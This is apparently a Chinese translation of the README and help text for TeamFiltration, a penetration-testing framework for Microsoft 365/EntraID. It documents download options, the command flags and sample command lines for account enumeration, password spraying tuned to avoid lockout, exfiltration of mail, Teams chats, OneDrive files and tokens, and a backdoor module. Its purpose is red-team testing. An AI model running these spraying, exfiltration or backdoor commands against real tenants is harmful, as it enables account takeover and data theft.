TeamFiltration 是一个跨平台框架,用于枚举、喷射、窃取和植入后门的 O365 EntraID 账户。 请参阅 TeamFiltration 维基页面了解 TeamFiltration 的工作原理,以及快速入门指南学习如何快速上手!
该工具自 2021 年 1 月起在 TrustedSec 内部使用,并在 DefCON30 期间我的演讲 Taking a Dump In The Cloud 中公开发布。
您可以下载适用于 Linux、Windows 和 MacOS 的最新预编译版本
这些版本预编译为单个应用程序依赖的二进制文件。体积会增加,但您无需 .NET 或任何其他依赖即可运行它们。
AWS Fireprox 功能已从喷射和枚举模块中移除。取而代之的是,该工具可以将所有流量路由到您在配置文件中定义的代理。该代理会自动用于喷射和枚举。如果您想将代理用于窃取,必须启用 --debug 标志。
╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╗
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╠╬╬╝╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╣ │ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╣ ││ ╚╬╬╝╚ └╚╝╬╬╬╬╬╬
╬╬╬╬╣ ╔╦╦╬╬╬╬╬╬╦╦╗ ││ │ ╬╬╬╬╬
╬╬╬╬╣ ╔╬╬╬╝╝┘ ╚╝╝╬╬╬┐ ││ ││ └╬╬╬╬
╬╬╬╬┤ ╬╬╝╚╩╬╗╔ ╚╬╬╬ ││ ││ ╬╬╬╬
╬╬╬╬┤ ╬╝ ╚╬╬╗╗ ╔ ╚╬╗ ││ ├││ ╬╬╬╬
╬╬╬╬┤ ╬╬ ╔╗ ╚╬╬╬╬╬╬╦ ╬╬ │┌ ╔╬┤││ ╔╬╬╬╬
╬╬╬╬┤ ╔╬┤ ╬╬╬ ╬╬╬╬╬╬╬╬╝╝╝╬╬╗ ╠╬╬╬╬╬╬╬╬╬╗ ┌╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╚╩┘ ╚╬╬╬╬╬╩ ╠╬╬ ╚╝╝╝╝╝╝╝╝╝╬╬╗╗╗╦╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╠╬╬ ││ ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬ ╦╗ ╗╗ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬┐ ╚╬╗╗ ╔╬╬╝ ╔╬┘ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬╗ ╚╩╩╬╬╬╩╩╝╝ ╔╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ ╚╬╬╬╗ ┌╗╬╬╝┘ ││ │ ╬╬╬╬
╬╬╬╬┤ ╚╩╬╬╬╦╦╦╦╦╦╬╬╬╝╝ ││ │ ╬╬╬╬
╬╬╬╬┤ ╚╚╝╝╝╝ ││ │ ╬╬╬╬
╬╬╬╬┤ ││ │ ╔╗╬╬╬╬╬
╬╬╬╬┤ ││ ╬╦╦╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ││ ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬╬╗╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
└╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╝
╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝
[❤] TeamFiltration V3.5.5 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed
使用方法:
--outpath 存储数据库和窃取信息的输出路径(所有模块都需要)
--config TeamFiltration.json 配置文件的本地路径,如果未提供,则从当前路径加载
--exfil 加载窃取模块
--username 覆盖以针对数据库中不存在的给定用户名进行操作
--password 覆盖以针对数据库中不存在的给定密码进行操作
--tokens 覆盖以针对(以换行符分隔的JWT令牌文件|单个JWT|逗号分隔的JWT令牌)并执行窃取
--cookie-dump 覆盖以针对使用其刷新cookie集合的给定账户进行操作
--all 窃取所有SSO资源(Graph、OWA、SharePoint、OneDrive、Teams)的信息
--aad 窃取Graph API的信息(域用户和组)
--teams 窃取Teams API的信息(文件、聊天记录、附件、联系人列表)
--teams-db 从窃取的Teams数据库中窃取cookie和认证令牌
--onedrive 窃取OneDrive/SharePoint API的信息(可访问的SharePoint文件和用户的整个OneDrive目录)
--owa 窃取Outlook REST API的信息(最近2000封电子邮件,包括发送和接收)
--owa-limit 设置要窃取的最大电子邮件数量,默认2000
--jwt-tokens 转储所有收集到的用于SSO资源的JSON格式JWT令牌(MsGraph、AdGraph、Outlook、SharePoint、OneDrive、Teams)
--spray 加载喷射模块
--aad-sso 使用SecureWorks的Azure Active Directory密码暴力破解技术进行喷射
--us-cloud 在喷射连接到美国租户时使用(https://login.microsoftonline.us/)
--passwords 密码列表的路径,如果不提供,将生成常见弱密码
--exclude 要从喷射中排除的电子邮件列表路径
--seasons-only 生成的喷射密码仅基于季节
--months-only 生成的喷射密码仅基于月份
--common-only 使用前20个最常用密码进行喷射
--shuffle-passwords 在喷射前打乱密码列表
--shuffle-users 在喷射前打乱目标用户列表
--shuffle-regions 在喷射时打乱FireProx区域
--auto-exfil 如果发现有效登录,自动启动窃取模块
--sleep-min 每次完整喷射轮次之间的最小睡眠分钟数,默认=60
--sleep-max 每次完整喷射轮次之间的最大睡眠分钟数,默认=100
--jitter 每次单独认证尝试之间的秒数,默认=0
--time-window 定义喷射发生的时间窗口,使用军事时间格式 <12:00-19:00>
--push 当发现有效凭证时通过Pushover发送通知(需要配置中的pushover密钥)
--push-locked 当被喷射的账户被锁定时通过Pushover发送通知(需要配置中的pushover密钥)
--force 即使距离上次尝试不到<sleep>时间,也强制进行喷射
--enum 加载枚举模块
--domain 要执行枚举的域,如果未提供--usernames,则从statistically-likely-usernames中提取名称
--usernames 要枚举的用户名列表路径(电子邮件)
--dehashed 使用dehashed子模块从基础域枚举电子邮件
--validate-msol 使用公共GetCredentialType方法验证给定的o365账户是否存在(速率限制极严 - 慢速20 e/s)
--validate-teams 使用Teams API方法验证给定的o365账户是否存在(推荐 - 超快300 e/s)
--validate-login 通过尝试登录来验证给定的o365账户(有噪音 - 触发登录 - 快速100 e/s)
--validate-onedrive 使用@nyxgeek的OneDrive方法验证给定的o365账户(推荐 - 快速300 e/s)
--backdoor 加载交互式后门模块
--database 加载交互式数据库浏览器模块
--debug 将所有出站HTTP请求代理到配置中指定的代理
示例:
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\FooBar\Exclude_Emails.txt
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --enum --validate-onedrive --domain example.com
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\FooBar\OSINT\Usernames.txt
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --backdoor
--outpath C:\Clients\FooBar\TFOutput --config myCustomConfig.json --database